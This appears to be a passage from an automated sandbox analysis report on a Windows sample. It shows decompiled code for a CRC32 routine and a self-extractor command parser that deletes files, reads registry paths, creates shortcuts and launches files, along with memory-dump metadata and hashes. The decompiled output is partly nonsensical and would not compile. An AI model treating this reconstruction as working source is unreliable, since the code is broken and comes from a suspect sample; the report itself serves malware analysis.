                                                                                                                			E00EC15F3(signed char _a4, signed char _a8, unsigned int _a12) {
				signed char _t49;
				signed char _t51;
				signed char _t67;
				signed char _t68;
				unsigned int _t72;
				unsigned int _t74;

				_t67 = _a8;
				_t49 = _a4;
				_t74 = _a12;
				if(_t74 != 0) {
					while((_t67 & 0x00000007) != 0) {
						_t49 = _t49 >> 0x00000008 ^  *(0xef1d70 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_a8 = _t67;
						_t74 = _t74 - 1;
						if(_t74 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				if(_t74 >= 8) {
					_t72 = _t74 >> 3;
					do {
						_t51 = _t49 ^  *_t67;
						_t74 = _t74 - 8;
						_t68 =  *(_t67 + 4);
						_t67 = _a8 + 8;
						_a8 = _t67;
						_t49 =  *(0xef1d70 + (_t68 >> 0x18) * 4) ^  *(0xef2170 + (_t68 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xef2570 + (_t68 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xef2d70 + (_t51 >> 0x18) * 4) ^  *(0xef3170 + (_t51 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xef3570 + (_t51 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xef2970 + (_t68 & 0x000000ff) * 4) ^  *(0xef3970 + (_t51 & 0x000000ff) * 4);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				if(_t74 != 0) {
					do {
						_t49 = _t49 >> 0x00000008 ^  *(0xef1d70 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_t74 = _t74 - 1;
					} while (_t74 != 0);
				}
				return _t49;
			}









                                                                                                                0x00ec15f6
                                                                                                                0x00ec15fa
                                                                                                                0x00ec15fe
                                                                                                                0x00ec1603
                                                                                                                0x00ec1605
                                                                                                                0x00ec1615
                                                                                                                0x00ec161c
                                                                                                                0x00ec161d
                                                                                                                0x00ec1620
                                                                                                                0x00ec1623
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec1623
                                                                                                                0x00ec1605
                                                                                                                0x00ec1625
                                                                                                                0x00ec1628
                                                                                                                0x00ec1631
                                                                                                                0x00ec1634
                                                                                                                0x00ec1634
                                                                                                                0x00ec1636
                                                                                                                0x00ec1639
                                                                                                                0x00ec1696
                                                                                                                0x00ec1699
                                                                                                                0x00ec16ad
                                                                                                                0x00ec16af
                                                                                                                0x00ec16af
                                                                                                                0x00ec16b4
                                                                                                                0x00ec16b7
                                                                                                                0x00ec16b9
                                                                                                                0x00ec16c4
                                                                                                                0x00ec16cb
                                                                                                                0x00ec16cc
                                                                                                                0x00ec16cc
                                                                                                                0x00ec16b9
                                                                                                                0x00ec16d6

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9905329142a151b59d38b5b9728ed7e119d0715e5c65e46883631d7d4e10dfda
                                                                                                                • Instruction ID: a5f0e2ae229ab4f196c4d1e923603ae0eaf491a79142c67fe859435f9826fcf9
                                                                                                                • Opcode Fuzzy Hash: 9905329142a151b59d38b5b9728ed7e119d0715e5c65e46883631d7d4e10dfda
                                                                                                                • Instruction Fuzzy Hash: EB219B71A201658FCB08CF2EDDA09767761A7C730178A816FEE46EB2D1C536D929C7D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED10B5, Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 428windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 52%
                                                                                                                			E00ED10B5(void* __edx) {
				intOrPtr _t212;
				void* _t217;
				intOrPtr _t273;
				void* _t286;
				signed int _t288;
				void* _t292;
				signed int _t293;
				void* _t297;

				_t286 = __edx;
				E00ED3344();
				_t212 = 0x1bc80;
				E00ED3370();
				if( *((intOrPtr*)(_t297 + 0xc)) == 0) {
					L167:
					 *[fs:0x0] =  *((intOrPtr*)(_t297 - 0xc));
					return _t212;
				}
				_push(0x1000);
				_push(_t297 - 0xe);
				_push(_t297 - 0xd);
				_push(_t297 - 0x5c84);
				_push(_t297 - 0xfc8c);
				_push( *((intOrPtr*)(_t297 + 0xc)));
				_t212 = E00ECFD06();
				 *((intOrPtr*)(_t297 + 0xc)) = 0x1bc80;
				if(0x1bc80 != 0) {
					_t273 =  *((intOrPtr*)(_t297 + 0x10));
					do {
						_t217 = _t297 - 0x5c84;
						_t292 = _t297 - 0x1bc8c;
						_t288 = 6;
						goto L4;
						L6:
						while(E00EC7B7C(_t297 - 0xfc8c,  *((intOrPtr*)(0xef1508 + _t293 * 4))) != 0) {
							_t293 = _t293 + 1;
							if(_t293 < 0xe) {
								continue;
							} else {
								goto L165;
							}
						}
						if(_t293 > 0xd) {
							goto L165;
						}
						switch( *((intOrPtr*)(_t293 * 4 +  &M00ED1CA9))) {
							case 0:
								__eflags = _t273 - 2;
								if(_t273 == 2) {
									E00ECF158(_t297 - 0x7c84, 0x800);
									E00EC284C(E00EC35E2(_t297 - 0x7c84, _t297 - 0x5c84, _t297 - 0xdc8c, 0x800), _t273, _t297 - 0x8c8c, _t293);
									 *(_t297 - 4) = 0;
									E00EC2986(_t297 - 0x8c8c, _t297 - 0xdc8c);
									E00EC1AD9(_t297 - 0x3c84);
									while(1) {
										_push(0);
										_t281 = _t297 - 0x8c8c;
										_t235 = E00EC28D9(_t297 - 0x8c8c, _t286, _t297 - 0x3c84);
										__eflags = _t235;
										if(_t235 == 0) {
											break;
										}
										SetFileAttributesW(_t297 - 0x3c84, 0);
										__eflags =  *(_t297 - 0x2c78);
										if(__eflags == 0) {
											L18:
											_t239 = GetFileAttributesW(_t297 - 0x3c84);
											__eflags = _t239 - 0xffffffff;
											if(_t239 == 0xffffffff) {
												continue;
											}
											_t241 = DeleteFileW(_t297 - 0x3c84);
											__eflags = _t241;
											if(_t241 != 0) {
												continue;
											} else {
												_t295 = 0;
												_push(0);
												goto L22;
												L22:
												E00EC37E6(_t297 - 0x103c, 0x800, L"%s.%d.tmp", _t297 - 0x3c84);
												_t299 = _t299 + 0x14;
												_t246 = GetFileAttributesW(_t297 - 0x103c);
												__eflags = _t246 - 0xffffffff;
												if(_t246 != 0xffffffff) {
													_t295 = _t295 + 1;
													__eflags = _t295;
													_push(_t295);
													goto L22;
												} else {
													_t249 = MoveFileW(_t297 - 0x3c84, _t297 - 0x103c);
													__eflags = _t249;
													if(_t249 != 0) {
														MoveFileExW(_t297 - 0x103c, 0, 4);
													}
													continue;
												}
											}
										}
										E00EC32B6(_t281, __eflags, _t297 - 0x7c84, _t297 - 0x103c, 0x800);
										E00EC2FC6(__eflags, _t297 - 0x103c, 0x800);
										_t296 = E00ED8683(_t297 - 0x7c84);
										__eflags = _t296 - 4;
										if(_t296 < 4) {
											L16:
											_t260 = E00EC35A2(_t297 - 0x5c84);
											__eflags = _t260;
											if(_t260 != 0) {
												break;
											}
											L17:
											_t263 = E00ED8683(_t297 - 0x3c84);
											__eflags = 0;
											 *((short*)(_t297 + _t263 * 2 - 0x3c82)) = 0;
											E00ED4440(0x800, _t297 - 0x3c, 0, 0x1e);
											_t299 = _t299 + 0x10;
											 *((intOrPtr*)(_t297 - 0x38)) = 3;
											_push(0x14);
											_pop(_t266);
											 *((short*)(_t297 - 0x2c)) = _t266;
											 *((intOrPtr*)(_t297 - 0x34)) = _t297 - 0x3c84;
											_push(_t297 - 0x3c);
											 *0xf26048();
											goto L18;
										}
										_t271 = E00ED8683(_t297 - 0x103c);
										__eflags = _t296 - _t271;
										if(_t296 > _t271) {
											goto L17;
										}
										goto L16;
									}
									 *(_t297 - 4) =  *(_t297 - 4) | 0xffffffff;
									E00EC2862(_t297 - 0x8c8c);
								}
								goto L165;
							case 1:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L165;
								} else {
									__eax =  *0xf222f4;
									__eflags =  *0xf222f4;
									__ebx = __ebx & 0xffffff00 |  *0xf222f4 == 0x00000000;
									__eflags = __bl;
									if(__bl == 0) {
										__eax =  *0xf222f4;
										_pop(__ecx);
										_pop(__ecx);
									}
									__bh =  *((intOrPtr*)(__ebp - 0xd));
									__eflags = __bh;
									if(__eflags == 0) {
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										__esi = E00ECFE6A(__ecx, __edx, __eflags);
										__eax =  *0xf222f4;
									} else {
										__esi = __ebp - 0x5c84;
									}
									__eflags = __bl;
									if(__bl == 0) {
										__edi = __eax;
									}
									__eax = E00ED8683(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0xf222f4);
									__eax = E00EDA926(__ecx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax == 0) {
										L39:
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L00ED869E(__esi);
										}
										goto L165;
									}
									 *0xf222f4 = __eax;
									__eflags = __bl;
									if(__bl != 0) {
										__ecx = 0;
										__eflags = 0;
										 *__eax = __cx;
									}
									__eax = E00EDC237(__eax, __esi);
									_pop(__ecx);
									_pop(__ecx);
									goto L39;
								}
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
								}
								goto L165;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L165;
								}
								__eflags =  *0xf0ea72 - __di;
								if( *0xf0ea72 != __di) {
									goto L165;
								}
								__eax = 0;
								__edi = __ebp - 0x5c84;
								_push(0x22);
								 *(__ebp - 0x103c) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x5c84) - __ax;
								if( *(__ebp - 0x5c84) == __ax) {
									__edi = __ebp - 0x5c82;
								}
								__eax = E00ED8683(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L165;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L52:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L64:
											__ebp - 0x103c = E00EC674F(__ebp - 0x103c, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L65:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x103c;
											__eax = E00ED4BBB(__ebp - 0x103c, __ebp - 0x103c);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
												if( *((intOrPtr*)(__eax + 2)) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x103c;
											__edi = 0xf0ea72;
											E00EC674F(0xf0ea72, __ebp - 0x103c, __esi) = __ebp - 0x103c;
											__eax = E00ECFBA9(__ebp - 0x103c, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c);
											__eax = SendMessageW(__esi, 0x143, __ebx, 0xf0ea72);
											__eax = __ebp - 0x103c;
											__eax = E00EDA780(__ebp - 0x103c, 0xf0ea72, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x103c = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x103c);
											}
											goto L165;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L55:
											__eax = __ebp - 0x18;
											__ebx = 0;
											_push(__ebp - 0x18);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0xf26010();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x103c;
												_push(__ebp - 0x103c);
												__eax = __ebp - 0x1c;
												_push(__ebp - 0x1c);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x18));
												__eax =  *0xf26000();
												_push( *(__ebp - 0x18));
												 *0xf26008() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x103c) = __cx;
											}
											__eflags =  *(__ebp - 0x103c) - __bx;
											if( *(__ebp - 0x103c) != __bx) {
												__eax = __ebp - 0x103c;
												__eax = E00ED8683(__ebp - 0x103c);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x103c = E00EC6727(__eflags, __ebp - 0x103c, "\\", __esi);
												}
											}
											__esi = E00ED8683(__edi);
											__eax = __ebp - 0x103c;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x103c = E00EC6727(__eflags, __ebp - 0x103c, __edi, 0x800);
											}
											goto L65;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L64;
										}
										goto L55;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L52;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L165;
									}
									__ebp - 0x103c = E00EC674F(__ebp - 0x103c, __edi, 0x800);
									goto L65;
								}
							case 4:
								__eflags =  *0xf0ea6c - 1;
								__eflags = __eax - 0xf0ea6c;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__ebx + 6) & __bl;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L82:
									 *0xf0ca37 = __cl;
									 *0xf0ca60 = 1;
									goto L165;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0xf0ca37 = __cl;
									L81:
									 *0xf0ca60 = __cl;
									goto L165;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L82;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L165;
								}
								 *0xf0ca37 = 1;
								goto L81;
							case 6:
								__eflags = __ebx - 4;
								if(__ebx != 4) {
									goto L92;
								}
								__eax = __ebp - 0x5c84;
								__eax = E00EDA780(__ebp - 0x5c84, __eax, L"<>");
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L92;
								}
								_push(__edi);
								goto L91;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									L113:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0xf0ea6c;
										if( *0xf0ea6c == 0) {
											 *0xf0ea6c = 2;
										}
										 *0xf0da68 = 1;
									}
									goto L165;
								}
								__eax = __ebp - 0x7c84;
								__edi = 0x800;
								__eax = GetTempPathW(0x800, __ebp - 0x7c84); // executed
								__ebp - 0x7c84 = E00EC2FC6(__eflags, __ebp - 0x7c84, 0x800);
								__eax = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0xef14e8);
									__ebp - 0x7c84 = E00EC37E6(0xf0da6a, __edi, L"%s%s%u", __ebp - 0x7c84);
									__eax = E00EC2520(0xf0da6a);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xf0da6a); // executed
								__eflags =  *(__ebp - 0x5c84);
								if( *(__ebp - 0x5c84) == 0) {
									goto L165;
								}
								__eflags =  *0xf1b1ea;
								if( *0xf1b1ea != 0) {
									goto L165;
								}
								__eax = 0;
								 *(__ebp - 0x143c) = __ax;
								__eax = __ebp - 0x5c84;
								_push(0x2c);
								_push(__ebp - 0x5c84);
								__eax = E00ED49DE(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L109:
									__eflags =  *(__ebp - 0x143c);
									if( *(__ebp - 0x143c) == 0) {
										__ebp - 0x1bc8c = __ebp - 0x5c84;
										E00EC674F(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
										__ebp - 0x143c = E00EC674F(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
									}
									__ebp - 0x5c84 = E00ECF7AC(__ebp - 0x5c84);
									__eax = 0;
									 *(__ebp - 0x4c84) = __ax;
									__ebp - 0x143c = __ebp - 0x5c84;
									__eax = E00ECF2B3( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
									__eflags = __eax - 6;
									if(__eax == 6) {
										goto L165;
									} else {
										_push(1);
										_push( *(__ebp + 8));
										__eax = 0;
										__eflags = 0;
										 *0xf0ca34 = 1;
										 *0xf0da6a = __ax;
										__eax =  *0xf2609c();
										goto L113;
									}
								}
								__edx = 0;
								__esi = 0;
								__eflags =  *(__ebp - 0x5c84) - __dx;
								if( *(__ebp - 0x5c84) == __dx) {
									goto L109;
								}
								__ecx = 0;
								__eax = __ebp - 0x5c84;
								while(1) {
									__eflags =  *__eax - 0x40;
									if( *__eax == 0x40) {
										break;
									}
									__esi =  &(__esi->i);
									__eax = __ebp - 0x5c84;
									__ecx = __esi + __esi;
									__eax = __ebp - 0x5c84 + __ecx;
									__eflags =  *__eax - __dx;
									if( *__eax != __dx) {
										continue;
									}
									goto L109;
								}
								__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
								__ebp - 0x143c = E00EC674F(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x5c84) = __ax;
								goto L109;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x5c84) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x5c84;
										_push(__ebp - 0x5c84);
										__eax = E00EDC1D6(__ebx, __edi);
										_pop(__ecx);
										 *0xf23304 = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0xf23300 = E00ECFE6A(__ecx, __edx, __eflags);
								}
								 *0xf1b1eb = 1;
								goto L165;
							case 9:
								__eflags = __ebx - 5;
								if(__ebx != 5) {
									L92:
									 *0xf23308 = 1;
									goto L165;
								}
								_push(1);
								L91:
								__eax = __ebp - 0x5c84;
								_push(__ebp - 0x5c84);
								_push( *(__ebp + 8));
								__eax = E00ED2020(__ebp);
								goto L92;
							case 0xa:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L165;
								}
								__eax = 0;
								 *(__ebp - 0x2c3c) = __ax;
								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
								__eax = E00EDB480( *(__ebp - 0x1bc8c) & 0x0000ffff);
								_push(0x800);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0xf201f2);
									__eax = __ebp - 0x2c3c;
									_push(__ebp - 0x2c3c);
									__eax = E00EC674F();
									 *(__ebp - 0x14) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x2c3c;
									if(__eflags == 0) {
										_push(0xf1f1f2);
										_push(__eax);
										__eax = E00EC674F();
										 *(__ebp - 0x14) = 7;
									} else {
										_push(0xf211f2);
										_push(__eax);
										__eax = E00EC674F();
										 *(__ebp - 0x14) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0x9c8c) = __ax;
								 *(__ebp - 0x1c3c) = __ax;
								__ebp - 0x19c8c = __ebp - 0x6c84;
								__eax = E00EDB78E(__ebp - 0x6c84, __ebp - 0x19c8c);
								_pop(__ecx);
								_pop(__ecx);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x6c84) - __bx;
								if( *(__ebp - 0x6c84) != __bx) {
									__ebp - 0x6c84 = E00EC2520(__ebp - 0x6c84);
									__eflags = __al;
									if(__al != 0) {
										goto L150;
									}
									__ebx = __edi;
									__esi = __ebp - 0x6c84;
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) == __bx) {
										goto L150;
									}
									_push(0x20);
									_pop(__ecx);
									do {
										__eax = __esi->i & 0x0000ffff;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L138:
											__edi = __eax;
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x6c84 = E00EC2520(__ebp - 0x6c84);
											__eflags = __al;
											if(__al == 0) {
												__esi->i = __di;
												L146:
												_push(0x20);
												_pop(__ecx);
												__edi = 0;
												__eflags = 0;
												goto L147;
											}
											_push(0x2f);
											_pop(__eax);
											__ebx = __esi;
											__eflags = __di - __ax;
											if(__di != __ax) {
												_push(0x20);
												_pop(__eax);
												do {
													__esi =  &(__esi->i);
													__eflags = __esi->i - __ax;
												} while (__esi->i == __ax);
												_push(__esi);
												__eax = __ebp - 0x1c3c;
												L144:
												_push(__eax);
												__eax = E00EDB78E();
												_pop(__ecx);
												_pop(__ecx);
												 *__ebx = __di;
												goto L146;
											}
											 *(__ebp - 0x1c3c) = __ax;
											__eax =  &(__esi->i);
											_push( &(__esi->i));
											__eax = __ebp - 0x1c3a;
											goto L144;
										}
										_push(0x2f);
										_pop(__edx);
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L147;
										}
										goto L138;
										L147:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __di;
									} while (__esi->i != __di);
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										__eflags = 0;
										 *__ebx = __ax;
									}
									goto L150;
								} else {
									__ebp - 0x19c8a = __ebp - 0x6c84;
									E00EDB78E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
									_push(__ebx);
									_push(__ebp - 0x6c82);
									__eax = E00ED49DE(__ecx);
									__esp = __esp + 0x10;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x1c3c = E00EDB78E(__ebp - 0x1c3c, __ebp - 0x1c3c);
										_pop(__ecx);
										_pop(__ecx);
									}
									L150:
									__eflags =  *((short*)(__ebp - 0x11c8c));
									__ebx = 0x800;
									if( *((short*)(__ebp - 0x11c8c)) != 0) {
										__ebp - 0x9c8c = __ebp - 0x11c8c;
										__eax = E00EC2FF8(__ebp - 0x11c8c, __ebp - 0x9c8c, 0x800);
									}
									__ebp - 0xbc8c = __ebp - 0x6c84;
									__eax = E00EC2FF8(__ebp - 0x6c84, __ebp - 0xbc8c, __ebx);
									__eflags =  *(__ebp - 0x2c3c);
									if(__eflags == 0) {
										__ebp - 0x2c3c = E00ECFDFE(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
									}
									__ebp - 0x2c3c = E00EC2FC6(__eflags, __ebp - 0x2c3c, __ebx);
									__eflags =  *((short*)(__ebp - 0x17c8c));
									if(__eflags != 0) {
										__ebp - 0x17c8c = __ebp - 0x2c3c;
										E00EC6727(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
										__eax = E00EC2FC6(__eflags, __ebp - 0x2c3c, __ebx);
									}
									__ebp - 0x2c3c = __ebp - 0xcc8c;
									__eax = E00EDB78E(__ebp - 0xcc8c, __ebp - 0x2c3c);
									__eflags =  *(__ebp - 0x13c8c);
									__eax = __ebp - 0x13c8c;
									_pop(__ecx);
									_pop(__ecx);
									if(__eflags == 0) {
										__eax = __ebp - 0x19c8c;
									}
									__ebp - 0x2c3c = E00EC6727(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
									__eax = __ebp - 0x2c3c;
									__eflags = E00EC3252(__ebp - 0x2c3c);
									if(__eflags == 0) {
										L160:
										__ebp - 0x2c3c = E00EC6727(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
										goto L161;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L161:
											_push(1);
											__eax = __ebp - 0x2c3c;
											_push(__ebp - 0x2c3c);
											E00EC23EF(__ecx, __ebp) = __ebp - 0xbc8c;
											__ebp - 0xac8c = E00EDB78E(__ebp - 0xac8c, __ebp - 0xbc8c);
											_pop(__ecx);
											_pop(__ecx);
											__ebp - 0xac8c = E00EC370E(__eflags, __ebp - 0xac8c);
											__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
											__eax = __ebp - 0x1c3c;
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
											__edx = __ebp - 0x9c8c;
											__esi = __ebp - 0xac8c;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
											 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
											asm("sbb eax, eax");
											__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
											 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
											__eax = __ebp - 0x15c8c;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
											E00ECF89E(__ebp - 0x15c8c) = __ebp - 0x2c3c;
											__ebp - 0xbc8c = E00ECEF4C(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
											__eflags =  *(__ebp - 0xcc8c);
											if( *(__ebp - 0xcc8c) != 0) {
												_push(__edi);
												__eax = __ebp - 0xcc8c;
												_push(__ebp - 0xcc8c);
												_push(5);
												_push(0x1000);
												__eax =  *0xf2604c();
											}
											goto L165;
										}
										goto L160;
									}
								}
							case 0xb:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0xf0ea70 = 1;
								}
								goto L165;
							case 0xc:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eax = E00EDB480( *(__ebp - 0x5c84) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0xf0ca61 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0xf0ca62 = 1;
									} else {
										__eax = 0;
										 *0xf0ca61 = __al;
										 *0xf0ca62 = __al;
									}
								}
								goto L165;
							case 0xd:
								 *0xf23309 = 1;
								__eax = __eax + 0xf23309;
								_t110 = __esi + 0x39;
								 *_t110 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t110;
								__ebp = 0xffffa37c;
								if( *_t110 != 0) {
									_t112 = __ebp - 0x5c84; // 0xffff46f8
									__eax = _t112;
									_push(_t112);
									 *0xef14ec = E00EC7B68();
								}
								goto L165;
						}
						L4:
						_t217 = E00ECF981(_t217, _t292);
						_t292 = _t292 + 0x2000;
						_t288 = _t288 - 1;
						if(_t288 != 0) {
							goto L4;
						} else {
							_t293 = _t288;
							goto L6;
						}
						L165:
						_push(0x1000);
						_t203 = _t297 - 0xe; // 0xffffa36e
						_t204 = _t297 - 0xd; // 0xffffa36f
						_t205 = _t297 - 0x5c84; // 0xffff46f8
						_t206 = _t297 - 0xfc8c; // 0xfffea6f0
						_push( *((intOrPtr*)(_t297 + 0xc)));
						_t212 = E00ECFD06();
						_t273 =  *((intOrPtr*)(_t297 + 0x10));
						 *((intOrPtr*)(_t297 + 0xc)) = _t212;
					} while (_t212 != 0);
				}
			}











                                                                                                                0x00ed10b5
                                                                                                                0x00ed10ba
                                                                                                                0x00ed10bf
                                                                                                                0x00ed10c4
                                                                                                                0x00ed10cd
                                                                                                                0x00ed1c97
                                                                                                                0x00ed1c9a
                                                                                                                0x00ed1ca4
                                                                                                                0x00ed1ca4
                                                                                                                0x00ed10d3
                                                                                                                0x00ed10db
                                                                                                                0x00ed10df
                                                                                                                0x00ed10e6
                                                                                                                0x00ed10ed
                                                                                                                0x00ed10ee
                                                                                                                0x00ed10f1
                                                                                                                0x00ed10f8
                                                                                                                0x00ed10fd
                                                                                                                0x00ed1104
                                                                                                                0x00ed1109
                                                                                                                0x00ed110b
                                                                                                                0x00ed1111
                                                                                                                0x00ed1117
                                                                                                                0x00ed1117
                                                                                                                0x00000000
                                                                                                                0x00ed112c
                                                                                                                0x00ed1143
